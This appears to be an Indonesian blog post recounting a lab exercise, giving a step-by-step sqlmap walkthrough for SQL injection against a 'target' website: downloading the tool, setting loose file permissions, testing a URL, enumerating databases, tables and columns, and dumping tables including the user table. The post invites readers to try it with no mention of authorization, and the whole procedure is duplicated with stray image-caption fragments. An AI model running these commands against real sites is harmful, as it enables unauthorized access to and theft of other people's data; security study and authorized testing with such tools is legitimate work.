SQL INJECTION sore agan kemarin saya abis praktikum keamanan jaringan, ada yang mau nyoba nyadap password iseng nggak, enggaklah ya, ini sql injection buat liat si database web target monggo di coba,,
1. Siapkan ubuntu lalu masuk ke root
2. Pilih direktori /home/[username]
# cd /home/[username]
3. Download sqlmap
# wget [alamat ip]/sqlmap.tar.gz
4. Ekstrak file sqlmap.tar.gz
# tar –xvf sqlmap.tar.gz
5. Setelah itu kita akan mendapatkan folder dengan nama “sqlmapproject-sqlmap-
779db7c”.
6. Pilih direktori sqlmap tersebut
# cd sqlmapproject-sqlmap-779db7c/ && ls
7. Ubah file permission “sqlmap.py” menajadi 7777
# chmod –c 7777 sqlmap.py
8. Lakukan vulnerability test pada suatu website.
# ./sqlmap.py –u [alamat website]
9. Tunggu beberapa saat sampai sqlmap memberikan laporan vulnerability testnya.
10. Setelah melakukan vulnerability test, sqlmap akan menampilkan laporan seperti berikut.
Gambar diatas menunjukan parameter-parameter yang memiliki kemungkinan untuk di
injeksi dan kode sql yang diinjeksikan oleh sqlmap melalui alamat web.
11. Untuk mendapatkan list database yang berada pada server target, lakukan perintah
berikut.
# ./sqlmap.py –u [alamat website] --dbs 12. Setelah itu kita dapat melihat seluruh database yang berada pada server mysql target.
13. Untuk menampilkan tabel dan kolom yang berada pada satu database, gunakan
perintah berikut.
# ./sqlmap.py –u [alamat website] --tables --columns -D [nama database]
14. Dari perintah diatas kita akan mendapatkan seluruh informasi mengenai tabel dan
kolom yang terdapat pada server target, termasuk tabel user yang sangat krusial.
15. hal terakhir dan yang menjadi tujuan peretas adalah untuk mendapatkan data dari
server database target, untuk mendapatkan data dari database target, lakukan perintah
berikut.
# ./sqlmap.py –u [alamat website] --dump -D [nama database] –T [nama tabel]
16. Dengan begitu kita dapat melihat seluruh isi database dari server target.
17. Untuk melihat log file dari sqlmap dapat dilihat pada direktori
/root/.sqlmap/output/[alamat web]
1. Siapkan ubuntu lalu masuk ke root
2. Pilih direktori /home/[username]
# cd /home/[username]
3. Download sqlmap
# wget [alamat ip]/sqlmap.tar.gz
4. Ekstrak file sqlmap.tar.gz
# tar –xvf sqlmap.tar.gz
5. Setelah itu kita akan mendapatkan folder dengan nama “sqlmapproject-sqlmap-
779db7c”.
6. Pilih direktori sqlmap tersebut
# cd sqlmapproject-sqlmap-779db7c/ && ls
7. Ubah file permission “sqlmap.py” menajadi 7777
# chmod –c 7777 sqlmap.py
8. Lakukan vulnerability test pada suatu website.
# ./sqlmap.py –u [alamat website]
9. Tunggu beberapa saat sampai sqlmap memberikan laporan vulnerability testnya.
 |
| Cara Melihat Database Sebuah Situs 2015 |
 |
| Cara Melihat Database Sebuah Situs 2015 |
Gambar diatas menunjukan parameter-parameter yang memiliki kemungkinan untuk di
injeksi dan kode sql yang diinjeksikan oleh sqlmap melalui alamat web.
11. Untuk mendapatkan list database yang berada pada server target, lakukan perintah
berikut.
# ./sqlmap.py –u [alamat website] --dbs 12. Setelah itu kita dapat melihat seluruh database yang berada pada server mysql target.
13. Untuk menampilkan tabel dan kolom yang berada pada satu database, gunakan
perintah berikut.
# ./sqlmap.py –u [alamat website] --tables --columns -D [nama database]
14. Dari perintah diatas kita akan mendapatkan seluruh informasi mengenai tabel dan
kolom yang terdapat pada server target, termasuk tabel user yang sangat krusial.
15. hal terakhir dan yang menjadi tujuan peretas adalah untuk mendapatkan data dari
server database target, untuk mendapatkan data dari database target, lakukan perintah
berikut.
# ./sqlmap.py –u [alamat website] --dump -D [nama database] –T [nama tabel]
16. Dengan begitu kita dapat melihat seluruh isi database dari server target.
17. Untuk melihat log file dari sqlmap dapat dilihat pada direktori
/root/.sqlmap/output/[alamat web]
0 komentar:
Posting Komentar